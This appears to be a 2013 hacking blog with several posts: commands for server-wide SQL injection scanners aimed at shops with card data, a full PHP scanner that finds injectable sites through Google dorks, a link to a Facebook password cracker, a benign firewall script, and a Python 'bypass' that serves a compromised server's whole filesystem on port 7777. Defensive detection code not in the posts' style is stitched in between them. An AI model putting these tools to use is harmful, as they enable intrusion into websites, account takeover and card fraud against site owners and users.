Wednesday, June 5, 2013

Scan sqli all server

This is a really good tool. Imagine you have found a shop that definitely has cc, or a site you need to hack, but it has no vulnerability. Checking the whole server by hand takes a lot of time, and sometimes we give up. This tool checks the whole server, quick and tidy. Hihi
Commands
Scan one website:
./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt
Scan the whole server:

 ./Domain-SQLi-finder.py --verbose 1 --durl demo.testfire.net --crawl 50 --pages 5 --sites 4 --vulsites 2 --output testfire-SQLi.txt

Download the file here



wget http://www.chilkatsoft.com/download/chi ... nux.tar.gz
tar xvf chilkat-9.4.0-python-2.7-i686-linux.tar.gz 
mv usr/local/lib/python2.7/site-packages/* /usr/local/lib/python2.7/dist-packages

Install the library if it is missing.
You can also use uniscan:
./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
This scans the whole server.

To scan one site: ./uniscan.pl -u "http://site.com/" -b -q -d -w

To scan from a file listing sites: ./uniscan.pl -f site.txt -bqdw

Tuesday, June 4, 2013

darkzone's PHP SQLi scan code

PHP SQLi scan code by darkzone.

<html>
<head>
<title>SQLi Scan - Dark Zone</title>

<!--
****************************************************************
*           SQLi Scanner by DarKmindz @ 31337 ZoNe             *
*                                                               *
* Fuck You n00b & Shit Talker & Time Wasters & Scriptkiddiots! *
****************************************************************

Written by DarKmindz @ 31337 ZoNe

Yuck Fou,
./DarkMindz & 
-->

<style>
body{
background: black;
color: red;
font-family: monospace;
font-size: 12px;
}

input{
background: black;
border: 1px solid red;
color: red;
}

h2{
color: red;
}

a{ color: #5A5A5A; text-decoration: none; }
a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
a:hover{ color: #00FF00; text-decoration: line-through; }
.effectok:hover { text-decoration: underline; }
.effectfalse:hover { text-decoration: line-through; }

</style>

</head>
<body>

<?php
echo "<center>";
echo "<form action='' method='post'>";
echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site'></p>";
echo "<input type='submit' value=' Fvck It! '>";
echo "<hr><br />";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 900) {
$a = 0;
flush(); ob_flush();
echo "Pages: [ $b ]<br />";
echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
echo "Scanning Google<br />";
flush(); ob_flush();

if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "Bisey bulunamad?<br />";
flush(); ob_flush();
break;
}

preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Loadiing…<br />";
flush(); ob_flush();
while(1) {

if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectok'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='green'>SQL Injection Success !</font><br />";
} else {
echo "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."' target='_blank' class='effectfalse'>".str_replace("=", "='", $sites[2][$a])."</a> <== <font color='red'>Not access ! </font><br />";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Bitti<br />";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}

function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOW, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}
echo "</center>";
?>

</body>
</html>
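Seen from the server side, the probe in the script above is easy to recognise: it rewrites every `=` to `='`, so each request carries a parameter value that begins with a single quote, and a server-wide sweep shows one client doing this across several virtual hosts. The following is an added example, not part of the original post, that flags this pattern in an access log whose first field is the virtual host; the log format, IP addresses and host names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Assumed log format: vhost ip ident user [timestamp] "METHOD uri proto" status size
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def quote_probe_params(uri):
    """Names of query parameters whose decoded value starts or ends with a single quote."""
    hits = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        # parse_qsl percent-decodes, so %27 and a raw ' are treated alike.
        if value.startswith("'") or value.endswith("'"):
            hits.append(name)
    return hits

def find_sweeps(lines, min_vhosts=2):
    """Return {client_ip: sorted vhosts} for clients probing at least min_vhosts hosts."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if m and quote_probe_params(m.group("uri")):
            seen[m.group("ip")].add(m.group("vhost"))
    return {ip: sorted(hosts) for ip, hosts in seen.items() if len(hosts) >= min_vhosts}

# Constructed sample log lines (documentation IP ranges, made-up hosts).
SAMPLE_LOG = [
    'shop.example 203.0.113.9 - - [05/Jun/2013:10:00:01 +0000] "GET /item.php?id=%2712 HTTP/1.1" 500 512',
    'blog.example 203.0.113.9 - - [05/Jun/2013:10:00:02 +0000] "GET /post.php?p=\'7 HTTP/1.1" 200 2048',
    'blog.example 198.51.100.4 - - [05/Jun/2013:10:00:03 +0000] "GET /post.php?p=7 HTTP/1.1" 200 2048',
    'shop.example 198.51.100.4 - - [05/Jun/2013:10:00:04 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, hosts in find_sweeps(SAMPLE_LOG).items():
        print(ip, "probed", ", ".join(hosts))
```

The scanner only reports a hit when the response body contains a database error string, so returning a generic error page and using parameterised queries removes the signal it relies on.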






Facebook password dictionary scan ver 2.5

Download it here! (Includes the python package, the pass file and the fb.py file to run.)

http://www20.zippyshare.com/v/36247489/file.html



#!usr/bin/python

#Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !

#This program is for educational purposes only.

#Don't attack people facebook accounts it's illegal !


#If you want to crack into someone's account, you must have the permission of the user.


#Mauritania Attacker is not responsible.


import sys

import random

import mechanize

import cookielib

IrisT firewall ver 2

#!/bin/sh
#
# ---------------------------------
# IrIsT FireWall Ver 2.0
# Licence : Linux
# ---------------------------------
#
# Title   : IrIsT Linux FireWall Ver 2.0 
# Code    : Bash 
# Author  : Sajjad13and11
# Date    : 2013 16 May
# Home    : IrIsT Security Center
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf | 
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | Dr Koderz |
# Gr33tz  : Joker_s | Mr Zero | Smart Programmer | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#

clear 

echo "   ###   ####### #     #  "
echo "    #    #       #  #  #  "
echo "    #    #       #  #  #  "
echo "    #    #####   #  #  #  "
echo "    #    #       #  #  #  "
echo "    #    #       #  #  #  "
echo "   ###   #        ## ##   "


echo  "*****************************************************"
echo  "* IFW Firewall Dedicated Version (2)                *"
echo  "* Coded By Sajjad13and11                            *"
echo  "* IrIsT.Ir && IrIsT.Ir/en                           *"
echo  "* This script don't work on OpenVZ servers          *"
echo  "* The default rules saved in /root/iptables.def     *"
echo  "*****************************************************"

sleep 3

#
iptables-save > /root/iptables.def
MODPROBE="/sbin/modprobe"
RMMOD="/sbin/rmmod"
ARP="/usr/sbin/arp"
IRISTlim="-m limit --limit 2/s --limit-burst 8"
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="$LOG --log-ip-options"
PHIGH="1024:65535"
PSSH="1000:1023"

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/ip_forward

for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $i; done

Sym root bypass by opening a port, if the server allows running python

First, check whether the python package is installed on the server:
run python -h and see whether it returns any output.
If it runs, create the following python code and save it to the file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()





Then run it: python capuchino.py

Then check the result at victim:7777

This method can hide the results of the sym operation on the server.
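The listener this post starts is visible to the host's administrator in the socket table. The following is an added example, not part of the original post, that audits `ss -ltnp` output for interpreter-owned listeners bound to all interfaces on ports outside an allowlist; the allowlist, the interpreter set and the sample output are assumptions constructed for illustration.

```python
import re

ALLOWED_PORTS = {22, 80, 443}                   # expected listeners (assumption)
INTERPRETERS = {"python", "perl", "php", "ruby"}  # script runtimes to flag (assumption)
WILDCARD = {"0.0.0.0", "*", "[::]", "::"}       # "listening on every interface"

# One LISTEN row of `ss -ltnp`: state, queues, local addr:port, peer, users:(("name",pid=N,...
ROW_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s*'
    r'(?:users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)

def suspicious_listeners(ss_output, allowed=ALLOWED_PORTS):
    """Return (port, process, pid) for interpreter listeners on wildcard addresses off the allowlist."""
    findings = []
    for row in ss_output.splitlines():
        m = ROW_RE.match(row.strip())
        if not m or m.group("proc") is None:
            continue  # header row, or process info not visible (ss not run as root)
        port, proc = int(m.group("port")), m.group("proc")
        base = re.sub(r"[\d.]+$", "", proc)  # python2.7 -> python
        if m.group("addr") in WILDCARD and port not in allowed and base in INTERPRETERS:
            findings.append((port, proc, int(m.group("pid"))))
    return findings

# Constructed sample of `ss -ltnp` output.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80         0.0.0.0:*         users:(("apache2",pid=1033,fd=4))
LISTEN 0      5      0.0.0.0:7777       0.0.0.0:*         users:(("python2.7",pid=4242,fd=3))
LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=950,fd=21))
"""

if __name__ == "__main__":
    for port, proc, pid in suspicious_listeners(SAMPLE_SS):
        print("unexpected listener: port %d, process %s, pid %d" % (port, proc, pid))
```

Run `ss` as root so process names of other users are shown; a default-deny inbound firewall policy keeps such a listener unreachable even when it starts.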